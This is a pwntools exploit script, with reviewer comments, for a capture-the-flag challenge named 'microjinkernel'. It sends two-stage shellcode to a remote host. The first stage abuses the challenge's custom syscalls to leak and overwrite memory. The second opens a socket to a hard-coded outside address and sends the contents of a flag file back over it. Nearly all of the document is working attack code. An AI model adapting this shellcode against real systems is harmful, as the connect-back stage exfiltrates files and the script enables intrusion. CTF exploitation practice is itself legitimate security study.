Exploit Code:
# pwntools exploit script for the "microjinkernel" CTF challenge.
# Structure: assemble a stage-1 payload (talks to the target's custom syscalls),
# append a stage-2 payload (socket/connect/open/read/write), pad the whole
# buffer to 0x1000 bytes and send it once the service prints 'code > '.
#
# NOTE(review): this file relies on Python 2 str semantics — under Python 3
# pwntools' asm() returns bytes, and the str fills/concatenations used below
# (ljust(..., "\x90"), str + bytes) would raise TypeError.
from pwn import *

context(arch='amd64', os='linux', log_level='debug')

# Local debugging target is commented out; the remote is the challenge host.
#p = process('./microjinkernel', aslr=True)
p = remote('52.78.196.197', 7483)

# Stage 1. The three lea's compute rip-relative addresses into the data that
# is appended after this code (see `payload` below). The labels cus_open ..
# cus_vuln are tiny helpers: each loads a syscall number (0x10001-0x10007)
# into rax, executes `syscall` and returns. The fixed addresses 0x1100000 /
# 0x11017e8 are challenge-specific values taken as-is from the original.
shellcode = '''
lea r8, [rip+0x1f9]
lea r9, [rip+0x210]
lea r11, [rip+0x227]
mov rbp, rsp
sub rsp, 0x208
mov rdi, r8
mov rsi, 0x10
call cus_open
mov rdi, r9
mov rsi, 0x10
call cus_open
mov rdi, 0
mov rsi, 0xf
call cus_init
mov rdi, 1
mov rsi, 0x1000
call cus_init
mov rdi, 1
call cus_close
mov r10, 0x11017e8
mov QWORD PTR [r10], 1
add r10, 8
mov QWORD PTR [r10], 0x38273
add r10, 8
mov QWORD PTR [r10], 1
mov rdi, 0x1100000
mov rsi, 0xff
call cus_vuln
mov rdi, 0xffffffff00000000
mov rsi, 0x20
mov rdx, 0x18
mov rcx, 0x1100000
call cus_write_vm
mov r10, 0x1100000
sub QWORD PTR [r10], 0x360
sub QWORD PTR [r10+0x10], 0x3e50
add QWORD PTR [r10+0x10], 0xcd70
mov rsi, QWORD PTR [r10]
sub rsi, QWORD PTR [r10+0x10]
add rsi, 0x1f6b
mov rdi, 0xffffffff00000000
mov rdx, 0x600
mov rcx, r11
call cus_read_vm
cus_open:
mov rax, 0x10001
syscall
ret
cus_init:
mov rax, 0x10002
syscall
ret
cus_close:
mov rax, 0x10003
syscall
ret
cus_read_vm:
mov rax, 0x10004
syscall
ret
cus_write_vm:
mov rax, 0x10005
syscall
ret
read_or_write:
mov rax, 0x10006
syscall
ret
cus_vuln:
mov rax, 0x10007
syscall
ret
'''

# Stage 2 (author's summary): open socket, connect, open flag, read flag,
# write socket. Uses the standard Linux x86-64 syscall numbers
# (0x29 socket, 0x2a connect, 2 open, 0 read, 1 write); the sockaddr and the
# file name are pushed onto the stack as immediates.
# open socket, connect, open flag, read flag, write socket
shellcode2 = '''
mov rdi, 2
mov rsi, 1
mov rdx, 0
mov rax, 0x29
syscall
mov r8, rax
mov rdi, rax
mov rdx, 0x10
mov rax, 0
push rax
mov rax, 0xe296260e401f0002
push rax
mov rsi, rsp
mov rax, 0x2a
syscall
mov rax, 0x67616c662f2e
push rax
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
mov rax, 2
syscall
mov rdi, rax
mov rsi, rsp
sub rsi, 0x70
mov rdx, 0x70
mov rax, 0x0
syscall
mov rdi, r8
mov rax, 0x1
syscall
'''

shellcode = asm(shellcode)
shellcode2 = asm(shellcode2)

# Stage 1 is NOP-padded to exactly 0x200 bytes so the rip-relative offsets
# computed above land on the data block that follows.
shellcode = shellcode.ljust(0x200, "\x90")

# Data block referenced by stage 1: two NUL-padded path strings (0x1e bytes
# each), a NOP sled, the stage-2 code, and trailing NOPs.
payload = '/tmp/test' + "\x00"*21 + '/tmp/booo' + "\x00"*21 + '\x90'*0x105 + shellcode2 + '\x90'*0x100
# Effectively a no-op: the payload above is already longer than 0x100 bytes.
payload = payload.ljust(0x100, "\x00")

shellcode = shellcode + payload
# Final buffer is padded to the 0x1000 bytes the service expects.
shellcode = shellcode.ljust(0x1000, "\x00")

# pause() blocks until the operator presses a key (lets a debugger attach first).
pause()
p.sendafter('code > ', shellcode)
p.interactive()
설명 추후 추가 예정